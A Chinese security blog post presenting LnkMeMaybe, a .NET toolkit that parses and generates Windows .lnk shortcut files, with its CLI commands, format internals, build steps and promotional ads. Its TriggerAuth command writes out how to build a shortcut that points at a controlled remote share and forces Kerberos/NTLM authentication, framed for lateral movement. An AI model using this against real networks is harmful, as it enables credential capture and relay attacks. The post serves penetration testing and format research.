文章总结： LnkMeMaybe是基于.NET8开发的WindowsLNK文件处理工具包，完整实现MS-SHLLINK协议规范，支持解析和生成LNK文件。工具包含CLI生成器和图形化编辑器，提供TriggerAuth、WebShortcut等命令，可触发Kerberos/NTLM认证或创建特殊快捷方式，主要应用于内网渗透测试、横向移动和认证研究等安全场景。 综合评分： 78 文章分类： 渗透测试,内网渗透,红队,安全工具,二进制安全

神级工具！一枚 LNK 文件让你的内网认证无处遁形

棉花糖糖糖 棉花糖糖糖

棉花糖网络安全工具箱

2026年6月13日 10:38 四川

在小说阅读器读本章

去阅读

郑重声明：本文仅供安全研究与渗透测试技术交流，禁止用于任何非法途径。使用者行为与本公众号无关。

重点导读概述

LnkMeMaybe 是一款基于 .NET 8 构建的 Windows Shell Link（.lnk）文件处理工具包。核心功能覆盖 .lnk 文件的解析与生成，完整实现 MS-SHLLINK 协议规范。该工具包包含命令行生成器（LnkMeMaybe）与图形化编辑工具（LnkUi），主要服务于安全研究与渗透测试场景。

重点导读项目结构

| 模块 | 说明 | | — | — | | Lnk/ | 核心库，解析与生成 .lnk 二进制格式 | | LnkMeMaybe/ | CLI 工具，提供多种 .lnk 生成命令 | | LnkUi/ | Avalonia 11 MVVM 图形编辑器 | | LnkTests/ | MSTest 测试套件 |

重点导读核心架构

LnkHandler 为主入口类，组合以下组件：

• ShellLinkHeader：.lnk 文件头部，包含 LinkFlags、FileAttributes、FILETIME 等字段
• LinkTargetIDList：Shell Item ID List，Windows 文件系统快捷方式原生格式
• LinkInfo：网络路径关联信息
• StringData：显示名称、工作目录等字符串数据
• ExtraData：扩展数据块，包括环境变量块、达尔文标识块、图标路径块

重点导读CLI 命令

PART 01TriggerAuth

创建触发 Kerberos（回退至 NTLM）认证的 .lnk 文件。该文件不执行任何代码。

触发条件：

• 用户浏览至包含 .lnk 文件的共享目录
• .lnk 位于系统索引位置，SearchProtocolHost 以 SYSTEM 身份认证
• MSSense 服务运行且目录未豁免，MSSense.exe 以 SYSTEM 身份认证

LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -OutputPath notepad.lnk

PART 02WebShortcut

生成指向 Web URL 的 .lnk 文件。Windows 通常使用 .url 文件存储网页快捷方式，该命令以 .lnk 格式实现相同功能。

LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk

PART 03LocalShortcut

生成标准 Windows 快捷方式，目标路径以 Shell Item ID List（PIDL）格式存储。

LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk

PART 04EnvShortcut

生成使用环境变量字符串（EnvironmentVariableDataBlock）存储目标路径的 .lnk 文件。适用于引用系统可执行文件，变量在启动时展开。

LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk

重点导读技术实现

PART 05ShellLinkHeader

固定 0x4C 字节头部，CLSID 为 00021401-0000-0000-C000-000000000046。LinkFlags 位标志控制各数据块是否存在，支持 Unicode、达尔文标识、环境变量路径等特性。

PART 06ExtraData

扩展数据块结构，支持多类数据块：

• EnvironmentVariableDataBlock：环境变量路径
• DarwinDataBlock：达尔文标识
• IconEnvironmentDataBlock：图标路径
• CustomPropertyDataBlock：自定义属性
• KnownFolderDataBlock：已知文件夹别名

PART 07LinkInfo

网络相对链接信息，包含卷 ID、本地基路径、共享名称等字段。用于 UNC 路径快捷方式的解析与生成。

重点导读构建与运行

bashdotnet build Lnk.sln
dotnet build -c Release build.slnf
dotnet test
dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj

重点导读应用场景

• 横向移动认证触发
• 隐蔽路径快捷方式构造
• 跨 Windows 安装的可移植快捷方式
• .lnk 文件格式安全研究

本公众号非项目作者，仅做技术分享。

https://github.com/trustedsec/LnkMeMaybe

广告时间

低价考证包括但不限于CISP系列、PMP等等国内网安证书、网络安全交流群请关注公众号后点菜单栏的找棉花糖。

糖心会员站，网络安全必备网站，包括在线内网靶场、web靶场、src靶场、应急响应靶场，以及各种网安资料、教程、方案模版、以及超级多在线工具，99元包年！详细介绍：棉花糖会员站介绍(26年4月26日版本) ：在线内网靶场、网安资料方案、在线工具全能资源站，看完介绍百分百心动！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：棉花糖网络安全工具箱 棉花糖糖糖 棉花糖糖糖《神级工具！一枚 LNK 文件让你的内网认证无处遁形》